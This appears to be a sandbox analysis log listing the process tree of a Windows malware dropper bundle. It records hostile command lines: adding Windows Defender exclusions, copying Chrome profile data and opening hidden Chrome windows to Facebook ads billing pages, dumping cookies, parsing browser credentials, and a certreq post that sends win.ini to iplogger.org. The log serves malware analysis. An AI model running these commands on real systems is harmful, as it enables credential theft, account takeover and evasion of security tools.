PID:1508

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1656,7871030185744378419,12920897569097467055,131072 --disable-gpu-compositing --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3528 /prefetch:1
17⤵
PID:6616

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1656,7871030185744378419,12920897569097467055,131072 --disable-gpu-compositing --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3824 /prefetch:1
17⤵
PID:8768

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1656,7871030185744378419,12920897569097467055,131072 --disable-gpu-compositing --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3696 /prefetch:1
17⤵
PID:8924

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1656,7871030185744378419,12920897569097467055,131072 --disable-gpu-compositing --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3376 /prefetch:1
17⤵
PID:8728

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1656,7871030185744378419,12920897569097467055,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3972 /prefetch:8
17⤵
PID:8640

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1656,7871030185744378419,12920897569097467055,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4324 /prefetch:8
17⤵
PID:8800

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1656,7871030185744378419,12920897569097467055,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4192 /prefetch:8
17⤵
PID:10032

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1656,7871030185744378419,12920897569097467055,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4240 /prefetch:8
17⤵
PID:10104

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1656,7871030185744378419,12920897569097467055,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4268 /prefetch:8
17⤵
PID:10096

C:\Program Files\Google\Chrome\Application\86.0.4240.111\Installer\chrmstp.exe
"C:\Program Files\Google\Chrome\Application\86.0.4240.111\Installer\chrmstp.exe" --configure-user-settings --verbose-logging --system-level --force-configure-user-settings
17⤵
PID:9096

C:\Program Files\Google\Chrome\Application\86.0.4240.111\Installer\chrmstp.exe
"C:\Program Files\Google\Chrome\Application\86.0.4240.111\Installer\chrmstp.exe" --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Windows\TEMP\Crashpad --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=86.0.4240.111 --initial-client-data=0x23c,0x240,0x244,0x218,0x248,0x7ff633227740,0x7ff633227750,0x7ff633227760
18⤵
PID:10016

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1656,7871030185744378419,12920897569097467055,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5284 /prefetch:8
17⤵
PID:5828

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1656,7871030185744378419,12920897569097467055,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5412 /prefetch:8
17⤵
PID:6360

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1656,7871030185744378419,12920897569097467055,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5040 /prefetch:8
17⤵
PID:7744

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1656,7871030185744378419,12920897569097467055,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5152 /prefetch:8
17⤵
PID:7636

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1656,7871030185744378419,12920897569097467055,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4912 /prefetch:8
17⤵
PID:8960

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1656,7871030185744378419,12920897569097467055,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4960 /prefetch:8
17⤵
PID:8980

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1656,7871030185744378419,12920897569097467055,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5040 /prefetch:8
17⤵
PID:9064

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1656,7871030185744378419,12920897569097467055,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5156 /prefetch:8
17⤵
PID:4148

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1656,7871030185744378419,12920897569097467055,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5096 /prefetch:8
17⤵
PID:4460

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1656,7871030185744378419,12920897569097467055,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5112 /prefetch:8
17⤵
PID:7448

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1656,7871030185744378419,12920897569097467055,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1640 /prefetch:8
17⤵
PID:4168

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1656,7871030185744378419,12920897569097467055,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3400 /prefetch:8
17⤵
PID:9948

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1656,7871030185744378419,12920897569097467055,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1600 /prefetch:8
17⤵
PID:9944

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1656,7871030185744378419,12920897569097467055,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5300 /prefetch:8
17⤵
PID:8312

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1656,7871030185744378419,12920897569097467055,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4816 /prefetch:8
17⤵
PID:8380

C:\Windows\regedit.exe
regedit /s chrome-set.reg
13⤵
- Runs .reg file with regedit
PID:7352

C:\Users\Admin\AppData\Local\Temp\RarSFX5\parse.exe
parse.exe -f json -b firefox
13⤵
PID:5320

C:\Users\Admin\AppData\Local\Temp\RarSFX5\parse.exe
parse.exe -f json -b chrome
13⤵
PID:5816

C:\Users\Admin\AppData\Local\Temp\RarSFX5\parse.exe
parse.exe -f json -b edge
13⤵
PID:7596

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\hlliwzv5.sgp\askinstall18.exe & exit
10⤵
PID:8608

C:\Users\Admin\AppData\Local\Temp\hlliwzv5.sgp\askinstall18.exe
C:\Users\Admin\AppData\Local\Temp\hlliwzv5.sgp\askinstall18.exe
11⤵
PID:5876

C:\Windows\SysWOW64\cmd.exe
cmd.exe /c taskkill /f /im chrome.exe
12⤵
PID:8168

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im chrome.exe
13⤵
- Kills process with taskkill
PID:8384

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\eizih0w0.rsx\md7_7dfj.exe & exit
10⤵
PID:4112

C:\Users\Admin\AppData\Local\Temp\eizih0w0.rsx\md7_7dfj.exe
C:\Users\Admin\AppData\Local\Temp\eizih0w0.rsx\md7_7dfj.exe
11⤵
PID:8620

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\zxqzhrwy.x10\privacytools5.exe & exit
10⤵
PID:4136

C:\Users\Admin\AppData\Local\Temp\zxqzhrwy.x10\privacytools5.exe
C:\Users\Admin\AppData\Local\Temp\zxqzhrwy.x10\privacytools5.exe
11⤵
PID:9068

C:\Users\Admin\AppData\Local\Temp\zxqzhrwy.x10\privacytools5.exe
C:\Users\Admin\AppData\Local\Temp\zxqzhrwy.x10\privacytools5.exe
12⤵
PID:9088

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\bbc1yvx1.qao\GcleanerWW.exe /mixone & exit
10⤵
PID:5312

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\vnbbjwk0.cya\setup.exe /8-2222 & exit
10⤵
PID:7416

C:\Users\Admin\AppData\Local\Temp\vnbbjwk0.cya\setup.exe
C:\Users\Admin\AppData\Local\Temp\vnbbjwk0.cya\setup.exe /8-2222
11⤵
PID:6396

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Program Files (x86)\Falling-Glade"
12⤵
PID:6196

C:\Program Files (x86)\Falling-Glade\7za.exe
"C:\Program Files (x86)\Falling-Glade\7za.exe" e -p154.61.71.13 winamp-plugins.7z
12⤵
PID:5272

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c ""C:\Program Files (x86)\Falling-Glade\setup.exe" -map "C:\Program Files (x86)\Falling-Glade\WinmonProcessMonitor.sys""
12⤵
PID:6664

C:\Program Files (x86)\Falling-Glade\setup.exe
"C:\Program Files (x86)\Falling-Glade\setup.exe" -map "C:\Program Files (x86)\Falling-Glade\WinmonProcessMonitor.sys"
13⤵
PID:5764

C:\Program Files (x86)\Falling-Glade\7za.exe
"C:\Program Files (x86)\Falling-Glade\7za.exe" e -p154.61.71.13 winamp.7z
12⤵
PID:7096

C:\Program Files (x86)\Falling-Glade\setup.exe
"C:\Program Files (x86)\Falling-Glade\setup.exe" /8-2222
12⤵
PID:6376

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\ycbzhzop.mah\MultitimerFour.exe & exit
10⤵
PID:6912

C:\Users\Admin\AppData\Local\Temp\ycbzhzop.mah\MultitimerFour.exe
C:\Users\Admin\AppData\Local\Temp\ycbzhzop.mah\MultitimerFour.exe
11⤵
PID:8940

C:\Users\Admin\AppData\Local\Temp\GA91IH1MOZ\multitimer.exe
"C:\Users\Admin\AppData\Local\Temp\GA91IH1MOZ\multitimer.exe" 0 306033e7ac94ccd3.87625057 0 104
12⤵
PID:8452

C:\Users\Admin\AppData\Local\Temp\GA91IH1MOZ\multitimer.exe
"C:\Users\Admin\AppData\Local\Temp\GA91IH1MOZ\multitimer.exe" 1 3.1615300491.6047878b1e860 104
13⤵
PID:2176

C:\Users\Admin\AppData\Local\Temp\GA91IH1MOZ\multitimer.exe
"C:\Users\Admin\AppData\Local\Temp\GA91IH1MOZ\multitimer.exe" 2 3.1615300491.6047878b1e860
14⤵
PID:9076

C:\Users\Admin\AppData\Local\Temp\13fl13jl1er\vict.exe
"C:\Users\Admin\AppData\Local\Temp\13fl13jl1er\vict.exe" /VERYSILENT /id=535
15⤵
PID:7828

C:\Users\Admin\AppData\Local\Temp\is-P8THM.tmp\vict.tmp
"C:\Users\Admin\AppData\Local\Temp\is-P8THM.tmp\vict.tmp" /SL5="$40768,870426,780800,C:\Users\Admin\AppData\Local\Temp\13fl13jl1er\vict.exe" /VERYSILENT /id=535
16⤵
PID:6644

C:\Users\Admin\AppData\Local\Temp\is-MGCLT.tmp\wimapi.exe
"C:\Users\Admin\AppData\Local\Temp\is-MGCLT.tmp\wimapi.exe" 535
17⤵
PID:9244

C:\Users\Admin\AppData\Local\Temp\jdhwct441ec\askinstall24.exe
"C:\Users\Admin\AppData\Local\Temp\jdhwct441ec\askinstall24.exe"
15⤵
PID:3212

C:\Windows\SysWOW64\cmd.exe
cmd.exe /c taskkill /f /im chrome.exe
16⤵
PID:5408

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im chrome.exe
17⤵
- Kills process with taskkill
PID:5828

C:\Windows\SysWOW64\xcopy.exe
xcopy "C:\Users\Admin\AppData\Local\Google\Chrome\User Data" "C:\Users\Admin\AppData\Local\Temp\gcfgjfgjaa99\" /s /e /y
16⤵
PID:8100

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --window-position=-50000,-50000 --user-data-dir="C:\Users\Admin\AppData\Local\Temp\gcfgjfgjaa99" https://www.facebook.com/ https://www.facebook.com/pages/ https://secure.facebook.com/ads/manager/account_settings/account_billing/
16⤵
PID:10236

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler --user-data-dir=C:\Users\Admin\AppData\Local\Temp\gcfgjfgjaa99 /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Users\Admin\AppData\Local\Temp\gcfgjfgjaa99\Crashpad --metrics-dir=C:\Users\Admin\AppData\Local\Temp\gcfgjfgjaa99 --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=86.0.4240.111 --initial-client-data=0xd4,0xd8,0xdc,0xb0,0xe0,0x7ffe9b2e6e00,0x7ffe9b2e6e10,0x7ffe9b2e6e20
17⤵
PID:9120

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1608,5775718476859835049,11431065364806274855,131072 --lang=en-US --service-sandbox-type=network --user-data-dir="C:\Users\Admin\AppData\Local\Temp\gcfgjfgjaa99" --mojo-platform-channel-handle=1684 /prefetch:8
17⤵
PID:10772

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=1608,5775718476859835049,11431065364806274855,131072 --user-data-dir="C:\Users\Admin\AppData\Local\Temp\gcfgjfgjaa99" --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --mojo-platform-channel-handle=1624 /prefetch:2
17⤵
PID:10764

C:\Users\Admin\AppData\Local\Temp\nc2ohxc5b3l\chashepro3.exe
"C:\Users\Admin\AppData\Local\Temp\nc2ohxc5b3l\chashepro3.exe" /VERYSILENT
15⤵
PID:8668

C:\Users\Admin\AppData\Local\Temp\is-L8R3R.tmp\chashepro3.tmp
"C:\Users\Admin\AppData\Local\Temp\is-L8R3R.tmp\chashepro3.tmp" /SL5="$40758,1478410,58368,C:\Users\Admin\AppData\Local\Temp\nc2ohxc5b3l\chashepro3.exe" /VERYSILENT
16⤵
PID:10172

C:\Users\Admin\AppData\Local\Temp\xcvmrvkdecg\lgme4j1eafn.exe
"C:\Users\Admin\AppData\Local\Temp\xcvmrvkdecg\lgme4j1eafn.exe" /ustwo INSTALL
15⤵
PID:9156

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c taskkill /im "lgme4j1eafn.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\xcvmrvkdecg\lgme4j1eafn.exe" & exit
16⤵
PID:4480

C:\Windows\SysWOW64\taskkill.exe
taskkill /im "lgme4j1eafn.exe" /f
17⤵
- Kills process with taskkill
PID:9768

C:\Users\Admin\AppData\Local\Temp\uvmyhzjf1qm\Setup3310.exe
"C:\Users\Admin\AppData\Local\Temp\uvmyhzjf1qm\Setup3310.exe" /Verysilent /subid=577
15⤵
PID:10092

C:\Users\Admin\AppData\Local\Temp\is-C2VPK.tmp\Setup3310.tmp
"C:\Users\Admin\AppData\Local\Temp\is-C2VPK.tmp\Setup3310.tmp" /SL5="$504C8,802346,56832,C:\Users\Admin\AppData\Local\Temp\uvmyhzjf1qm\Setup3310.exe" /Verysilent /subid=577
16⤵
PID:1440

C:\Users\Admin\AppData\Local\Temp\is-87R8S.tmp\Setup.exe
"C:\Users\Admin\AppData\Local\Temp\is-87R8S.tmp\Setup.exe" /Verysilent
17⤵
PID:6472

C:\Users\Admin\AppData\Local\Temp\is-KTDDA.tmp\Setup.tmp
"C:\Users\Admin\AppData\Local\Temp\is-KTDDA.tmp\Setup.tmp" /SL5="$B0266,138429,56832,C:\Users\Admin\AppData\Local\Temp\is-87R8S.tmp\Setup.exe" /Verysilent
18⤵
PID:3524

C:\Users\Admin\AppData\Local\Temp\is-6IKHP.tmp\PictureLAb.exe
"C:\Users\Admin\AppData\Local\Temp\is-6IKHP.tmp\PictureLAb.exe" /Verysilent
19⤵
PID:8676

C:\Users\Admin\AppData\Local\Temp\is-OBM1L.tmp\PictureLAb.tmp
"C:\Users\Admin\AppData\Local\Temp\is-OBM1L.tmp\PictureLAb.tmp" /SL5="$804AE,1574549,56832,C:\Users\Admin\AppData\Local\Temp\is-6IKHP.tmp\PictureLAb.exe" /Verysilent
20⤵
PID:8904

C:\Users\Admin\AppData\Local\Temp\is-Q0MQ6.tmp\Setup.exe
"C:\Users\Admin\AppData\Local\Temp\is-Q0MQ6.tmp\Setup.exe" /VERYSILENT
21⤵
PID:2292

C:\Users\Admin\AppData\Local\Temp\is-23VD5.tmp\Setup.tmp
"C:\Users\Admin\AppData\Local\Temp\is-23VD5.tmp\Setup.tmp" /SL5="$209BE,298255,214528,C:\Users\Admin\AppData\Local\Temp\is-Q0MQ6.tmp\Setup.exe" /VERYSILENT
22⤵
PID:8500

C:\Users\Admin\AppData\Local\Temp\is-PQ035.tmp\def.exe
"C:\Users\Admin\AppData\Local\Temp\is-PQ035.tmp\def.exe" /S /UID=lab214
23⤵
PID:6972

C:\Users\Admin\AppData\Local\Temp\84-b9c7d-e07-57786-d36e469a2455c\SHaekaxabaesy.exe
"C:\Users\Admin\AppData\Local\Temp\84-b9c7d-e07-57786-d36e469a2455c\SHaekaxabaesy.exe"
24⤵
PID:10920

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\5aps2uyn.unc\customer4.exe & exit
25⤵
PID:9928

C:\Users\Admin\AppData\Local\Temp\5aps2uyn.unc\customer4.exe
C:\Users\Admin\AppData\Local\Temp\5aps2uyn.unc\customer4.exe
26⤵
PID:5232

C:\Users\Admin\AppData\Local\Temp\RarSFX6\main.exe
"C:\Users\Admin\AppData\Local\Temp\RarSFX6\main.exe"
27⤵
PID:5800

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\pgiemmar.led\askinstall18.exe & exit
25⤵
PID:5716

C:\Users\Admin\AppData\Local\Temp\pgiemmar.led\askinstall18.exe
C:\Users\Admin\AppData\Local\Temp\pgiemmar.led\askinstall18.exe
26⤵
PID:11596

C:\Windows\SysWOW64\cmd.exe
cmd.exe /c taskkill /f /im chrome.exe
27⤵
PID:12828

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\cgbyzqqy.1lk\md7_7dfj.exe & exit
25⤵
PID:12748

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\jqh41qf0.3yc\privacytools5.exe & exit
25⤵
PID:13000

C:\Users\Admin\AppData\Local\Temp\is-6IKHP.tmp\Delta.exe
"C:\Users\Admin\AppData\Local\Temp\is-6IKHP.tmp\Delta.exe" /Verysilent
19⤵
PID:10392

C:\Users\Admin\AppData\Local\Temp\is-VSS6H.tmp\Delta.tmp
"C:\Users\Admin\AppData\Local\Temp\is-VSS6H.tmp\Delta.tmp" /SL5="$60648,898740,56832,C:\Users\Admin\AppData\Local\Temp\is-6IKHP.tmp\Delta.exe" /Verysilent
20⤵
PID:10944

C:\Users\Admin\AppData\Local\Temp\is-SV4M5.tmp\Setup.exe
"C:\Users\Admin\AppData\Local\Temp\is-SV4M5.tmp\Setup.exe" /VERYSILENT
21⤵
PID:11792

C:\Users\Admin\AppData\Local\Temp\is-6IKHP.tmp\zznote.exe
"C:\Users\Admin\AppData\Local\Temp\is-6IKHP.tmp\zznote.exe" /Verysilent
19⤵
PID:12112

C:\Users\Admin\AppData\Local\Temp\is-8TFQA.tmp\zznote.tmp
"C:\Users\Admin\AppData\Local\Temp\is-8TFQA.tmp\zznote.tmp" /SL5="$20A30,138429,56832,C:\Users\Admin\AppData\Local\Temp\is-6IKHP.tmp\zznote.exe" /Verysilent
20⤵
PID:6008

C:\Users\Admin\AppData\Local\Temp\4mdzoyi4uge\app.exe
"C:\Users\Admin\AppData\Local\Temp\4mdzoyi4uge\app.exe" /8-23
15⤵
PID:1620

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Program Files (x86)\Polished-Silence"
16⤵
PID:6768

C:\Program Files (x86)\Polished-Silence\7za.exe
"C:\Program Files (x86)\Polished-Silence\7za.exe" e -p154.61.71.13 winamp-plugins.7z
16⤵
PID:8476

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c ""C:\Program Files (x86)\Polished-Silence\app.exe" -map "C:\Program Files (x86)\Polished-Silence\WinmonProcessMonitor.sys""
16⤵
PID:7624

C:\Program Files (x86)\Polished-Silence\app.exe
"C:\Program Files (x86)\Polished-Silence\app.exe" -map "C:\Program Files (x86)\Polished-Silence\WinmonProcessMonitor.sys"
17⤵
PID:9200

C:\Program Files (x86)\Polished-Silence\7za.exe
"C:\Program Files (x86)\Polished-Silence\7za.exe" e -p154.61.71.13 winamp.7z
16⤵
PID:8960

C:\Users\Admin\AppData\Local\Temp\is-AH9MD.tmp\Delta.exe
"C:\Users\Admin\AppData\Local\Temp\is-AH9MD.tmp\Delta.exe" /Verysilent
4⤵
PID:5576

C:\Users\Admin\AppData\Local\Temp\is-EQHMS.tmp\Delta.tmp
"C:\Users\Admin\AppData\Local\Temp\is-EQHMS.tmp\Delta.tmp" /SL5="$5064A,898740,56832,C:\Users\Admin\AppData\Local\Temp\is-AH9MD.tmp\Delta.exe" /Verysilent
5⤵
PID:5564

C:\Users\Admin\AppData\Local\Temp\is-5744N.tmp\Setup.exe
"C:\Users\Admin\AppData\Local\Temp\is-5744N.tmp\Setup.exe" /VERYSILENT
6⤵
PID:6808

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 6808 -s 876
7⤵
- Program crash
PID:7444

C:\Users\Admin\AppData\Local\Temp\is-AH9MD.tmp\zznote.exe
"C:\Users\Admin\AppData\Local\Temp\is-AH9MD.tmp\zznote.exe" /Verysilent
4⤵
- Adds Run key to start application
PID:2680

C:\Users\Admin\AppData\Local\Temp\is-QQ32Q.tmp\zznote.tmp
"C:\Users\Admin\AppData\Local\Temp\is-QQ32Q.tmp\zznote.tmp" /SL5="$30866,138429,56832,C:\Users\Admin\AppData\Local\Temp\is-AH9MD.tmp\zznote.exe" /Verysilent
5⤵
PID:6068

C:\Users\Admin\AppData\Local\Temp\is-BTSF7.tmp\jg4_4jaa.exe
"C:\Users\Admin\AppData\Local\Temp\is-BTSF7.tmp\jg4_4jaa.exe" /silent
6⤵
PID:5992

C:\Users\Admin\AppData\Local\Temp\is-AH9MD.tmp\hjjgaa.exe
"C:\Users\Admin\AppData\Local\Temp\is-AH9MD.tmp\hjjgaa.exe" /Verysilent
4⤵
PID:6856

C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
5⤵
PID:9640

C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
5⤵
PID:9892

C:\Users\Admin\AppData\Local\Temp\is-29H79.tmp\chashepro3.tmp
"C:\Users\Admin\AppData\Local\Temp\is-29H79.tmp\chashepro3.tmp" /SL5="$8029A,1478410,58368,C:\Users\Admin\AppData\Local\Temp\b4hgb2iyzsf\chashepro3.exe" /VERYSILENT
1⤵
PID:5360

C:\Program Files (x86)\JCleaner\mex.exe
"C:\Program Files (x86)\JCleaner\mex.exe"
2⤵
PID:5956

C:\Program Files (x86)\JCleaner\mex.exe
"{path}"
3⤵
PID:7580

C:\Program Files (x86)\JCleaner\mex.exe
"{path}"
3⤵
PID:7592

C:\Program Files (x86)\JCleaner\mex.exe
"{path}"
3⤵
PID:7612

C:\Windows\SysWOW64\cmd.exe
cmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Program Files (x86)\JCleaner\mex.exe"
4⤵
PID:4568

C:\Windows\SysWOW64\timeout.exe
timeout /T 10 /NOBREAK
5⤵
- Delays execution with timeout.exe
PID:7512

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"powershell" -command "Invoke-WebRequest -URI https://iplogger.org/1EaGq7"
2⤵
PID:5948

C:\Windows\SysWOW64\cmd.exe
"cmd.exe" /c "start https://iplogger.org/1EaGq7"
2⤵
PID:5940

C:\Windows\SysWOW64\cmd.exe
"cmd.exe" /c certreq -post -config https://iplogger.org/1EaGq7 %windir%\\win.ini %temp%\\2 & del %temp%\\2
2⤵
PID:5932

C:\Windows\SysWOW64\certreq.exe
certreq -post -config https://iplogger.org/1EaGq7 C:\Windows\\win.ini C:\Users\Admin\AppData\Local\Temp\\2
3⤵
PID:6744

C:\Program Files (x86)\JCleaner\Venita.exe
"C:\Program Files (x86)\JCleaner\Venita.exe"
2⤵
PID:5924

C:\Program Files (x86)\JCleaner\Venita.exe
"{path}"
3⤵
PID:7952

C:\Program Files (x86)\JCleaner\Brava.exe
"C:\Program Files (x86)\JCleaner\Brava.exe"
2⤵
PID:5916

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"powershell" -command "Invoke-WebRequest -URI https://iplogger.org/1aSny7"
2⤵
PID:5908

C:\Windows\SysWOW64\cmd.exe
"cmd.exe" /c "start https://iplogger.org/1aSny7"
2⤵
PID:5900

C:\Users\Admin\AppData\Local\Temp\is-M493H.tmp\10r2xzn2cgg.tmp
"C:\Users\Admin\AppData\Local\Temp\is-M493H.tmp\10r2xzn2cgg.tmp" /SL5="$206FE,552809,216064,C:\Users\Admin\AppData\Roaming\liu1brfsx3j\10r2xzn2cgg.exe" /VERYSILENT /p=testparams
